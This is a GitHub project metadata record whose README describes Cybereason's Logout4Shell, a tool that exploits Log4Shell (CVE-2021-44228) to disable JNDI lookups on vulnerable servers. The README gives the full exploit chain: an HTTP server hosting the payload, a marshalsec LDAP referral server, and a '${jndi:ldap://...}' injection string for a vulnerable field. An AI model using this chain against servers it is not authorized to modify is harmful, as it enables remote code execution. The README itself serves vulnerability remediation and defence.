{"id":13482494,"url":"https://github.com/Cybereason/Logout4Shell","last_synced_at":"2025-03-27T13:31:56.307Z","repository":{"id":45370897,"uuid":"437132269","full_name":"Cybereason/Logout4Shell","owner":"Cybereason","description":"Use Log4Shell vulnerability to vaccinate a victim server against Log4Shell","archived":false,"fork":false,"pushed_at":"2021-12-22T02:02:58.000Z","size":106,"stargazers_count":1708,"open_issues_count":1,"forks_count":111,"subscribers_count":24,"default_branch":"main","last_synced_at":"2025-03-25T07:08:37.113Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Cybereason.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-12-10T22:38:53.000Z","updated_at":"2025-03-22T10:41:21.000Z","dependencies_parsed_at":"2022-09-24T12:03:12.706Z","dependency_job_id":null,"html_url":"https://github.com/Cybereason/Logout4Shell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cybereason%2FLogout4Shell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cybereason%2FLogout4Shell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cybereason%2FLogout4Shell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cybereason%2FLogout4Shell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Cybereason","download_url":"https://codeload.github.com/Cybereason/Logout4Shell/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245854448,"owners_count":20683356,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-31T17:01:02.557Z","updated_at":"2025-03-27T13:31:56.272Z","avatar_url":"https://github.com/Cybereason.png","language":"Java","funding_links":[],"categories":["Java"],"sub_categories":[],"readme":"# Logout4Shell\n![logo](https://github.com/Cybereason/Logout4Shell/raw/main/assets/CR_logo.png)\n\n## Description \n\nA vulnerability impacting Apache Log4j versions 2.0 through 2.14.1 was disclosed on the project’s Github on December 9, 2021. \nThe flaw has been dubbed “Log4Shell,”, and has the highest possible severity rating of 10. Software made or\nmanaged by the Apache Software Foundation (From here on just \"Apache\") is pervasive and comprises nearly a third of all\nweb servers in the world—making this a potentially catastrophic flaw.\nThe Log4Shell vulnerability CVE-2021-44228 was published on 12/9/2021 and allows remote code execution on vulnerable servers.\n\n\nWhile the best mitigation against these vulnerabilities is to patch log4j to\n~~2.15.0~~2.17.0 and above, in Log4j version (\u003e=2.10) this behavior can be partially mitigated (see below) by\nsetting system property `log4j2.formatMsgNoLookups` to `true` or by removing\nthe JndiLookup class from the classpath. \n\nOn 12/14/2021 the Apache software foundation disclosed CVE-2021-45046 which was patched in log4j version 2.16.0. This\nvulnerability showed that in certain scenarios, for example, where attackers can control a thread-context variable that\ngets logged, even the flag `log4j2.formatMsgNoLookups` is insufficient to mitigate log4shell. An\nadditional CVE, less severe, CVE-2021-45105 was discovered. This vulnerability exposes the server to\nan infinite recursion that could crash the server is some scenarios. It is recommened to upgrade to\n2.17.0\n\nHowever, enabling these system property requires access to the vulnerable servers as well as a restart. \nThe [Cybereason](https://www.cybereason.com) research team has developed the\nfollowing code that _exploits_ the same vulnerability and the payload therein\nsets the vulnerable setting as disabled. The payload then searches\nfor all `LoggerContext` and removes the JNDI `Interpolator` preventing even recursive abuses. \nthis effectively blocks any further attempt to exploit Log4Shell on this server. \n\nThis Proof of Concept is based on [@tangxiaofeng7](https://github.com/tangxiaofeng7)'s [tangxiaofeng7/apache-log4j-poc](https://github.com/tangxiaofeng7/apache-log4j-poc)\n\nHowever, this project attempts to fix the vulnerability by using the bug against itself.\nYou can learn more about Cybereason's \"vaccine\" approach to the Apache Log4Shell vulnerability (CVE-2021-44228) on our website.\n\nLearn more: [Cybereason Releases Vaccine to Prevent Exploitation of Apache Log4Shell Vulnerability (CVE-2021-44228)](https://www.cybereason.com/blog/cybereason-releases-vaccine-to-prevent-exploitation-of-apache-log4shell-vulnerability-cve-2021-44228)\n\n## Supported versions\nLogout4Shell supports log4j version 2.0 - 2.14.1\n\n## How it works\nOn versions (\u003e= 2.10.0) of log4j that support the configuration `FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS`, this value is\nset to `True` disabling the lookup mechanism entirely. As disclosed in CVE-2021-45046, setting this flag is insufficient,\ntherefore the payload searches all existing `LoggerContexts` and removes the JNDI key from the `Interpolator` used to\nprocess `${}` fields. This means that even other recursive uses of the JNDI mechanisms will fail.\nThen, the log4j jarfile will be remade and patched. The patch is included in this\ngit repository, however it is not needed in the final build because the real patch\nis included in the payload as Base64.\n\nIn persistence mode (see [below](#transient-vs-persistent-mode)), the payload additionally attempts to locate the `log4j-core.jar`,\nremove the `JndILookup` class, and modify the PluginCache to completely remove the JNDI plugin. Upon subsequent JVM\nrestarts the `JndiLookup` class cannot be found and log4j will not support for JNDI\n\n## Transient vs Persistent mode\nThis package generates two flavors of the payload - Transient and Persistent. \nIn Transient mode, the payload modifies\nthe current running JVM. The payload is very delicate to just touch the logger context and configuration. We thus\nbelieve the risk of using the Transient mode are very low on production environments.\n\nPersistent mode performs all the changes of the Transient mode and *in addition* searches for the jar from which `log4j`\nloads the `JndiLookup` class. It then attempts to modify this jar by removing the `JndiLookup` class as well as\nmodifying the plugin registry. There is inherently more risk in this approach as if the `log4j-core.jar` becomes\ncorrupted, the JVM may crash on start.\n\nThe choice of which mode to use is selected by the URL given in step [2.3](#execution) below. The\nclass `Log4jRCETransient` selects the Transient Mode and the class `Log4jRCEPersistent` selects the persistent mode\n\nPersistent mode is based on the work of [TudbuT](https://github.com/TudbuT). Thank you!\n\n## How to use\n\n1. Download this repository and build it \n\n   1.1 `git clone https://github.com/cybereason/Logout4Shell.git`\n\n   1.2 build it - `mvn package`\n\n   1.3 `cd target/classes`\n\n   1.4 run the webserver - `python3 -m http.server 8888`\n\n2. Download, build and run Marshalsec's ldap server\n\n   2.1 `git clone https://github.com/mbechler/marshalsec.git`\n\n   2.2 `mvn package -DskipTests`\n   \n   2.3 `cd target`\n\n   2.4 \u003ca name=\"execution\"\u003e\u003c/a\u003e`java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer \"http://\u003cIP_OF_PYTHON_SERVER_FROM_STEP_1\u003e:8888/#Log4jRCE\u003cTransient/Persistent\u003e\"`\n\n4. To immunize a server\n\n   3.1 enter `${jndi:ldap://\u003cIP_OF_LDAP_SERVER_FROM_STEP_2\u003e:1389/a}` into a vulnerable field (such as user name)\n\n\n## DISCLAIMER: \nThe code described in this advisory (the “Code”) is provided on an “as is” and\n“as available” basis may contain bugs, errors and other defects. You are\nadvised to safeguard important data and to use caution. By using this Code, you\nagree that Cybereason shall have no liability to you for any claims in\nconnection with the Code. Cybereason disclaims any liability for any direct,\nindirect, incidental, punitive, exemplary, special or consequential damages,\neven if Cybereason or its related parties are advised of the possibility of\nsuch damages. Cybereason undertakes no duty to update the Code or this\nadvisory.\n\n## License\nThe source code for the site is licensed under the MIT license, which you can find in the LICENSE file.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FCybereason%2FLogout4Shell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FCybereason%2FLogout4Shell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FCybereason%2FLogout4Shell/lists"}